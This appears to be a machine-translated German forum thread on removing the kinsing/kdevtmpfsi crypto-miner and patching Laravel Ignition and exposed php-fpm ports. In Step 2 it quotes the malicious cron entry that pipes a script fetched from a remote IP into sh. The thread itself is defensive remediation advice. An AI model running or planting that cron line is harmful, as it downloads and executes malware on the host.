Die hier erwähnte Lösung hat bei uns funktioniert. Sie erstellen die Dateien, die der Miner verwendet, grundsätzlich ohne Rechte, sodass der Miner sie nicht erstellen und verwenden kann.https://github.com/docker-library/redis/issues/217
touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing
echo "everything is good here" > /tmp/kdevtmpfsi
echo "everything is good here" > /var/tmp/kinsing
touch /tmp/zzz
echo "everything is good here" > /tmp/zzz
chmod go-rwx /var/tmp
chmod 1777 /tmp
Ich hatte das gleiche Problem mit Laravel in Centos 8. Dies sind die Schritte, die ich befolgt habe, um die Malware zu entfernen und das System zu patchen.
Entfernen der Malware aus Systemschritten:Schritt 1:
Entfernen Sie die Malware:
Beenden Sie die beiden Prozesse (kdevtmpfsi
und kinsing
-Sie können den gleichen Namen haben, aber mit zufälligen Zeichen am Ende-) mit htop
oder jeder andere Prozessmanager.
htop F3 zum Suchen von Diensten kdevtmpfsi und kinsing
Verwenden Sie Folgendes, um die Dateien zu finden und zu löschen:
# find / -iname kdevtmpfsi* -exec rm -fv {} \;
# find / -iname kinsing* -exec rm -fv {} \;
Die Ausgabe sollte wie folgt aussehen:
removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'
Schritt 2:
Nach einem Cron-Job suchen:
Überprüfen Sie, ob es einen Cron-Job gibt, der die Malware neu initialisiert.
Ich habe meine gefunden in:/var/spool/cron/apache
>
UBUNTU /var/spool/cron/crontabs/www-data
Es beinhaltete Folgendes:
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
Schritt 3:
Neue Dateien erstellen und schreibgeschützt machen:
# touch /tmp/kdevtmpfsi && touch /tmp/kinsing
# echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
# echo "kinsing is fine now" > /tmp/kinsing
# chmod 0444 /tmp/kdevtmpfsi
# chmod 0444 /tmp/kinsing
Laravel-Projekt patchen:Schritt 1:
Schalten Sie APP_DEBUG aus:
Stellen Sie sicher, dass APP_DEBUG
Attribut ist false
in .env
denn so bekommt die Schwachstelle Zugriff.
Schritt 2:
Zündung aktualisieren:
Aktualisieren Sie die Zündung auf eine Version höher als 2.5.1
um sicherzustellen, dass die Schwachstelle gepatcht wird.
Führen Sie Folgendes in Ihrem Projektordner aus:
$ composer update facade/ignition
Ich habe einige Tage mit diesem Miner gekämpft und in meinem Fall war es der php-fpm:9000
Hafen ausgesetzt.
Ich denke, es ist möglich, auf diese Weise Code aus der Ferne einzufügen.
Wenn Sie also docker
verwenden mit php-fpm
, nicht ausführen Ihren Container auf diese Weise:
docker run -v /www:/var/www -p 9000:9000 php:7.4
Entfernen Sie die Portzuordnung: .-p 9000:9000
Vergessen Sie nicht, Ihre Container neu zu erstellen und neu zu starten.
Weitere Details hier:https://github.com/laradock/laradock/issues/2451#issuecomment-577722571